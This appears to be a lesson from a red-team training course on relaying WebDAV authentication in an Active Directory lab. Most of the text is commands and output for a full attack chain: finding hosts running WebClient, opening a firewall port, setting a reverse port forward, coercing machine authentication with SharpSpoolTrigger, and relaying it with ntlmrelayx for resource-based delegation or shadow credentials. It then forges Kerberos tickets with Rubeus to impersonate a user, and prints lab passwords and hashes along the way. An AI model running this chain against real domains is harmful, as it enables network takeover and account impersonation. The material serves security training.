Relaying WebDAV

Web Distributed Authoring and Versioning (aka WebDAV) is an extension that allows for basic file operations (create/copy/move/delete) over the HTTP protocol. Windows supports the use of WebDAV via Explorer where users can enter a URI or map a drive to a WebDAV server. The WebClient service facilitates Explorer's ability to use WebDAV. This is set to DEMAND_START by default, so is generally only running if a user has actively used a WebDAV resource. Some Windows technologies, such as SharePoint, use WebDAV fairly heavily.

C:\Users\bfarmer>sc qc WebClient
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WebClient
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalService -p
        LOAD_ORDER_GROUP   : NetworkProvider
        TAG                : 0
        DISPLAY_NAME       : WebClient
        DEPENDENCIES       : MRxDAV
        SERVICE_START_NAME : NT AUTHORITY\LocalService

As discovered by Lee Christensen, the WebClient exposes a named pipe called DAV RPC SERVICE, which makes it fairly easy to enumerate remote targets to establish whether the WebClient service is running or not. The GetWebDAVStatus repo by Dave Cossa provides C# and BOF projects that check for the presence of this named pipe.

beacon> inline-execute C:\Tools\GetWebDAVStatus\GetWebDAVStatus_BOF\GetWebDAVStatus_x64.o wkstn-1,wkstn-2
[+] WebClient service is active on wkstn-1
[x] Unable to hit DAV pipe on wkstn-2, system is either unreachable or does not have WebClient service running

This output shows that the service is running WKSTN-1, which makes it a viable target for this attack. The steps are to coerce the service into authenticating to a malicious WebDAV server that we control and then relay the authentication. A nice aspect of this attack is that we can force authentication to occur over any port, so we don't have to worry about needing PortBender (I can hear you all cheering). All we need to ensure is that whatever port we choose is allowed inbound on the host firewall we're reverse port forwarding from.

The incoming authentication material will be that of the machine account. ntlmrelayx can relay this to LDAP on a domain controller to abuse either RBCD (using the --delegate-access flag) or shadow creds (using the --shadow-credentials flag). In either case, ensure you run the HTTP server on a port that will not clash with any of your HTTP listeners. In this example, I've used port 8888.

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t ldaps://10.10.122.10 --delegate-access -smb2support --http-port 8888
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 8888
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

Once that's up and running, punch a hole in the firewall and set the reverse port forward.

beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> powershell New-NetFirewallRule -DisplayName "8888-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8888
beacon> rportfwd 8888 localhost 8888

Then use SharpSystemTriggers to trigger the authentication. The WebDAV URL needs to point to the reverse port forward.

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe wkstn-1 wkstn-2@8888/pwned

Once the traffic hits ntlmrelayx, it will relay to the domain controller.

[*] HTTPD(8888): Connection from 127.0.0.1 controlled, attacking target ldaps://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:636-<><>-OK
[*] HTTPD(8888): Authenticating against ldaps://10.10.122.10 as DEV/WKSTN-1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=dev,DC=cyberbotic,DC=io
[*] Adding new computer with username: PVWUMPYT$ and password: 4!t1}}I_CGJ}0OJ result: OK
[*] Delegation rights modified succesfully!
[*] PVWUMPYT$ can now impersonate users on WKSTN-1$ via S4U2Proxy

As indicated by the output above, a new machine account PVWUMPYT$ was created with password 4!t1}}I_CGJ}0OJ, which now has delegation rights to WKSTN-1$. To complete the attack chain, calculate the AES256 hash from the password.

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /domain:dev.cyberbotic.io /user:PVWUMPYT$ /password:'4!t1}}I_CGJ}0OJ'

[*] Action: Calculate Password Hash(es)

[*] Input password             : 4!t1}}I_CGJ}0OJ
[*] Input username             : PVWUMPYT$
[*] Input domain               : dev.cyberbotic.io
[*] Salt                       : DEV.CYBERBOTIC.IOhostpvwumpyt.dev.cyberbotic.io
[*]       rc4_hmac             : 2405A4D372AD265E38CF96FD6AF9B287
[*]       aes128_cts_hmac_sha1 : 8C7958F5262F804225B24D932BE02840
[*]       aes256_cts_hmac_sha1 : 46B94228F43282498F562FEF99C5C4AF67269BE5C8AD31B193135C7BD38A28A2
[*]       des_cbc_md5          : 49E0B985C1E00808

Then perform the S4U2Proxy to request service tickets of your choosing.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:PVWUMPYT$ /impersonateuser:nlamb /msdsspn:cifs/wkstn-1.dev.cyberbotic.io /aes256:46B94228F43282498F562FEF99C5C4AF67269BE5C8AD31B193135C7BD38A28A2 /nowrap

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 46B94228F43282498F562FEF99C5C4AF67269BE5C8AD31B193135C7BD38A28A2
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\PVWUMPYT$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
      
	doIFyj[...snip...]5pbw==

[*] Action: S4U

[*] Building S4U2self request for: 'PVWUMPYT$@DEV.CYBERBOTIC.IO'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2self request to 10.10.122.10:88
[+] S4U2self success!
[*] Got a TGS for 'nlamb' to 'PVWUMPYT$@DEV.CYBERBOTIC.IO'
[*] base64(ticket.kirbi):
      
	doIFhj[...snip...]BZVCQ=

[*] Impersonating user 'nlamb' to target SPN 'cifs/wkstn-1.dev.cyberbotic.io'
[*] Building S4U2proxy request for service: 'cifs/wkstn-1.dev.cyberbotic.io'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2proxy request to domain controller 10.10.122.10:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/wkstn-1.dev.cyberbotic.io':
      
	doIGfj[...snip...]5pbw==

Don't forget to remove the fake computer account.

The shadow credentials option will automatically dump a certificate file for you.

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t ldaps://10.10.122.10 --shadow-credentials -smb2support --http-port 8888

[...snip...]

[*] HTTPD(8888): Connection from 127.0.0.1 controlled, attacking target ldaps://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:636-<><>-OK
[*] HTTPD(8888): Authenticating against ldaps://10.10.122.10 as DEV/WKSTN-1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Searching for the target account
[*] Target user found: CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f2648f64-f170-cdaf-ba91-e4c0f0dfc540
[*] Updating the msDS-KeyCredentialLink attribute of WKSTN-1$
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: ROsU1G59.pfx
[*] Must be used with password: wBaP2YhsR7RgY0MZ6jwk
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx ROsU1G59.pfx -pfx-pass wBaP2YhsR7RgY0MZ6jwk dev.cyberbotic.io/WKSTN-1$ ROsU1G59.ccache

It can be converted to ccache format to use with Impacket, or base64 encoded to use with Rubeus.

attacker@ubuntu ~> cat ROsU1G59.pfx | base64 -w 0
MIII3Q[...snip...]YFLqI=

Since this is a certificate, we use it to request a TGT first which can then be used for S4U2Self.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIII3Q[...snip...]YFLqI= /password:wBaP2YhsR7RgY0MZ6jwk /nowrap

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=WKSTN-1$ 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
      
	doIGkD[...snip...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  WKSTN-1$
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  3/7/2024 7:21:57 PM
  EndTime                  :  3/8/2024 5:21:57 AM
  RenewTill                :  3/14/2024 7:21:57 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  +AsTZnOAH3IJ3FX03HAXvFQ1WGFp4yCF3NZ3YtBnmTo=
  ASREP (key)              :  6F0D7FCE1705DD3D851AEA768F8BDBA6BA24194D012A0A06A05B52F60108D946

Ensure the keys are deleted after the attack.

PreviousNTLM RelayingNextAD Certificate Services

Last updated